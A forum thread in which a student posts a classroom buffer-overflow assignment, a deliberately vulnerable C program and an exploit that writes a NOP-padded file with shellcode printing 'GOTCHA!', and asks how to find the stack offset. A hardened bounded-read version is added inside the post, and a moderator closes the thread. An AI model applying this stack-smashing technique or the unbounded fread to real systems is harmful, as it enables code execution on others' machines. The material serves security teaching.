Thread: Offset values and shellcode size.

  1. #1
    Registered User | Join Date: Apr 2012 | Posts: 1

    Offset values and shellcode size.

    So, I was given these two programs (vuln.c and exploit.c); my assignment was to describe the programs, explain the purpose of each of the statements, compile them and run the following sequence of commands:


    gcc vuln.c -o vuln
    gcc exploit.c -o exploit
    ./exploit


    -----supposed to get this output------------
    Using Offset: 0xbffff310
    Shellcode size: 38


    --------the output I get------------
    Using Offset: 0x836c861c
    Shell code Size: 38


    -------------then--------------------------
    od -t x2 badfile
    ./vuln


    ---------------the final output--------------------
    GOTCHA!



    Here are the codes:
    ----------------------------------------------
    vuln.c
    -----------------------------------------------
    Code:
    #include <stdlib.h>
    #include <stdio.h>

    /* The vulnerable function: buffer holds 8 bytes, but fread() is told it
       may store up to 1024. A badfile longer than 8 bytes overwrites whatever
       follows buffer on the stack, including bof()'s saved return address. */
    int bof()
    {
        char buffer[8];
        FILE *badfile;
        badfile = fopen("badfile", "r");
        if (badfile == NULL)          /* added check: the original dereferenced NULL */
            return 1;
        fread(buffer, sizeof(char), 1024, badfile);
        fclose(badfile);
        return 1;
    }

    int main(int argc, char **argv)
    {
        bof();
        /* Only reached if bof() returns to the instruction after the call. */
        printf("Not gonna do it! \n");
        return 1;
    }


    ----------------------------------------------------
    exploit.c
    ----------------------------------------------------
    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    /* Payload: 32-bit Linux code that calls write(1, "GOTCHA!\n", 9) and then
       exit(); the text at the end is the string it prints. The string's
       trailing NUL is why sizeof(shellcode) comes out as 38. */
    char shellcode[] =
     "\xeb\x16"
     "\x31\xdb"
     "\x31\xd2"
     "\x31\xc0"
     "\x59"
     "\xbb\x01\x00\x00\x00"
     "\xb2\x09"
     "\xb0\x04"
     "\xcd\x80"
     "\xb0\x01"
     "\xcd\x80"
     "\xe8\xe5\xff\xff\xff"
     "GOTCHA!\n"
    ;

    /* Distance added to this process's stack pointer to guess where vuln's
       stack will be. The assignment's expected 0xbffff310 assumes a fixed
       32-bit stack layout; a system that randomises the stack base (ASLR)
       prints a different value on every run. */
    #define OFFSET 1500

    /* Not called anywhere in this program; it mirrors the function in vuln.c. */
    int bof()
    {
       char buffer[8];
       strcpy(buffer, "AAAAAAAAA");
       return 1;
    }

    /* Read the stack pointer. The original had no return statement and relied
       on the value being left in EAX, which only works by accident at -O0; an
       output operand makes it explicit (%k0 names the 32-bit register). */
    unsigned long get_ESP(void)
    {
        unsigned long esp;
        __asm__("movl %%esp, %k0" : "=r"(esp));
        return esp;
    }

    int main(int argc, char **argv)
    {
      unsigned long addr;
      FILE *badfile;
      char buffer[1024];

      addr = get_ESP() + OFFSET;
      /* %lx and %zu match the argument types (the original used %x and %d). */
      fprintf(stderr, "Using Offset: 0x%lx\nShell code size: %zu\n",
                       addr, sizeof(shellcode));

      /* Fill the whole file with 0x90 (NOP) and put the payload at the end. */
      memset(buffer, 0x90, 1024);

      /* Bytes 12..15 of the file are where bof()'s saved return address lies
         on the assignment's 32-bit layout (8 bytes of buffer plus the saved
         frame pointer); store addr there little-endian. */
      buffer[12] = addr & 0x000000ff;
      buffer[13] = (addr & 0x0000ff00) >> 8;
      buffer[14] = (addr & 0x00ff0000) >> 16;
      buffer[15] = (addr & 0xff000000) >> 24;
      memcpy(&buffer[sizeof(buffer) - sizeof(shellcode)],
             shellcode, sizeof(shellcode));

      badfile = fopen("./badfile", "w");
      if (badfile == NULL) {
          perror("badfile");
          return 1;
      }
      fwrite(buffer, 1024, 1, badfile);
      fclose(badfile);
      return 0;
    }

    So, I got the output to show the correct shellcode size, which is 38, but I couldn't figure out a way to change the "Using Offset" value and get "GOTCHA!" when I execute vuln after exploit.

    To put it simply, I need to figure out how I can get the correct "Using Offset" value.

    Thank you and sorry for the long post.
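    The defect the assignment's vuln.c is built around is the fread() count: 1024 bytes requested into an 8-byte array. As an added example from the defender's side (not part of the original post or the assignment code), here is the same bof() with the read bounded by the buffer's own size, plus a flag that reports when the file carried more bytes than the buffer could hold, so an over-long badfile is noticed instead of silently spilling onto the stack. The file name badfile_demo and the helper write_test_file are assumptions for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Hardened counterpart of the thread's bof(): same 8-byte buffer, but fread()
   is asked for at most sizeof(buffer) bytes instead of 1024, so it cannot
   write past the array however long the file is. Returns the number of bytes
   stored, or -1 if the file cannot be opened. *overlong is set to 1 when the
   file held more data than fits, which is the condition the original let
   through unnoticed. */
long bof_safe(const char *path, int *overlong)
{
    char buffer[8];
    FILE *badfile;
    size_t n;

    *overlong = 0;
    badfile = fopen(path, "r");
    if (badfile == NULL)
        return -1;

    n = fread(buffer, sizeof(char), sizeof buffer, badfile);

    /* Anything left after the bounded read is input the buffer could not
       hold: report it rather than pretending the read was complete. */
    *overlong = (fgetc(badfile) != EOF);
    fclose(badfile);
    return (long)n;
}

/* Demo helper (assumption, not from the thread): write `len` bytes of 'A' to
   `path`, standing in for the 1024-byte badfile that exploit.c produces. */
int write_test_file(const char *path, size_t len)
{
    FILE *f = fopen(path, "w");
    size_t i;
    if (f == NULL)
        return -1;
    for (i = 0; i < len; i++)
        fputc('A', f);
    fclose(f);
    return 0;
}

int main(void)
{
    int overlong = 0;
    long n;

    write_test_file("badfile_demo", 1024);   /* constructed input */
    n = bof_safe("badfile_demo", &overlong);
    printf("stored %ld bytes; input exceeded the buffer: %s\n",
           n, overlong ? "yes" : "no");
    remove("badfile_demo");
    return 0;
}
```

    With a 1024-byte file the bounded read stores 8 bytes and sets the flag; with a file of 8 bytes or fewer the flag stays clear. The point is that the bound comes from sizeof on the array itself, so it cannot drift out of step with the buffer's declaration the way a hard-coded 1024 did.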

  2. #2
    laserlight, C++ Witch | Join Date: Oct 2003 | Location: Singapore | Posts: 28,413
    I understand that this is an academic assignment, but we generally do not discuss this sort of thing here, so I shall close this thread.
